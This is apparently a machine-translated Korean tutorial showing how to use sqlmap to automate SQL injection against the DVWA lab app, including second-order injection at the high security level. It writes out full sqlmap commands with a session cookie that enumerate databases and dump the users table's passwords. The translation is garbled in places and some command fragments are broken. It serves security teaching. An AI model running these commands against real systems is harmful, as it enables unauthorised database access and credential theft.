Sqlmap 자동 주입의 샘플 분석

WBOY
풀어 주다: 2023-05-13 15:31:13
앞으로
1112명이 탐색했습니다.

sqlmap을 사용하여 dvwa에 대한 주입 자동화
dvwa 수준을 낮음으로 설정

  1. dvwa의 SQL 주입(SQL 주입(Blind)) 열기, 브라우저 디버깅 열기, 사용자 ID 입력 및 제출, 차단된 요청 보기.

  2. GET 요청임을 알 수 있습니다. URL은 "http://192.168.1.222:8089/dvwa/vulneraries/sqli/?id=1&Submit=Submit#"

  3. 넣었습니다. salmap 테스트에 직접 들어가십시오. 잠시 동안 -u 명령을 사용하십시오. -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"

  4. 필요한 것을 볼 수 있습니다. 여기에 로그인하지 않으면 부족할 수 없습니다. 따라서 로그인을 유지하려면 쿠키를 추가해야 합니다

6. Burp Suite 프록시를 사용하여 패킷을 캡처하고, 로그인 쿠키를 얻고, --dbs 버스트 데이터 -u "http://192.168.1.222:8089/vulnerability/를 추가합니다. sqli/ ?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

폭발한 데이터베이스가 mysql

임을 알 수 있습니다. 7. -D xxx를 사용하여 데이터베이스를 보려면 --tables를 사용합니다. 이 데이터베이스의 모든 테이블을 봅니다. -u "http://192.168.1.222:8089/vulnerability/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security =low" -D dvwa --tables

실행 결과 보기:

8. -D xxx -T ttt를 사용하여 보려는 테이블을 지정하고 --columns를 사용하여 테이블의 열을 봅니다

- u "http://192.168.1.222: 8089/vulnerability/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T 사용자 --columns

9. -D xxx를 사용하여 데이터베이스를 보고, -T xxx는 볼 테이블을 지정하고, -C xxx를 사용하여 테이블의 열을 보고, -dump를 사용하여 열 데이터를 봅니다

-u "http://192.168 .1.222:8089/vulnerability/sqli/?id=1&Submit=Submit#" - -cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T 사용자 -C 비밀번호,user --dump

  • 조정 dvwa 보안 수준을 중간으로 설정하고 캡처된 데이터 패킷을 .txt 파일로 저장합니다. sqlmap 디렉터리에 직접 -r 파일 이름 --dbs(이후 매개변수를 직접 추가할 수 있습니다)


  • dvwa 보안 수준을 높음으로 조정하세요. 이번에 제출한 페이지는 결과를 반환하는 페이지와 동일하지 않기 때문에 여기서는 이전 방법을 사용할 수 없습니다. 2차 주입 방식을 사용하려면

  • 데이터 제출 URL​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​​ 캡처된 데이터 패킷을 .txt 파일로 저장하고 sqlmap 디렉터리로 이동하여 데이터베이스를 폭발시킵니다. 명령:
    -r 1.txt --second-url

  • "http://192.168.1.222:8089/vulnerability/sqli/" -- 배치 --레벨 2
  • --dbs

                                                              qli/" - -batch - -레벨 2 -D dvwa --tables

                                                               /vulnerability/sqli /" ​ -- 배치 --level 2 -D dvwa -T user --columns

​ 폭발된 필드 데이터

-r 1.tx t --second-url " http://192.168.1.222:8089/vulnerability/sqli/" -- 배치 --level 2 -D dvwa - T users -C user,password --dump

몇 가지 개념적 질문:

2차 주입: 2차

sql 주입--때로는 2차. 주입 지점에 입력된 데이터가 반환되면 결과는 현재 페이지가 아니라 다른 페이지입니다. 이때 응답을 받을 페이지를 지정하여 true인지 false인지 확인해야 합니다. –second-url 다음에 반환된 페이지의 URL 주소

--batch: 자동 기본 구성, 수동으로 yes 또는 no를 누를 필요가 없습니다

  • level:Sqlmap에는 총 5개의 감지 수준이 있으며 기본값은 1입니다. 수준이 높을수록 탐지 중에 더 많은 페이로드가 사용됩니다. 그 중 레벨 5의 페이로드가 가장 많으며 쿠키, XFF 등의 헤더를 자동으로 크랙하여 주입합니다. 물론 레벨이 높을수록 감지 시간은 느려집니다. 이 매개변수는 테스트의 주입 지점에 영향을 미칩니다. GET 및 POST 데이터는 레벨이 2일 때 테스트됩니다. HTTP User-Agent/Referer 헤더는 레벨이 3일 때 테스트됩니다. 어떤 매개변수가 주입 지점인지 확실하지 않은 경우 정확도를 보장하기 위해 레벨을 5로 설정하는 것이 좋습니다(속도도 느려집니다)

  • 위 내용은 Sqlmap 자동 주입의 샘플 분석의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

    관련 라벨:
    원천:yisu.com
    본 웹사이트의 성명
    본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
    인기 튜토리얼
    더>
    최신 다운로드
    더>
    웹 효과
    웹사이트 소스 코드
    웹사이트 자료
    프론트엔드 템플릿
    회사 소개 부인 성명 Sitemap
    PHP 중국어 웹사이트:공공복지 온라인 PHP 교육,PHP 학습자의 빠른 성장을 도와주세요!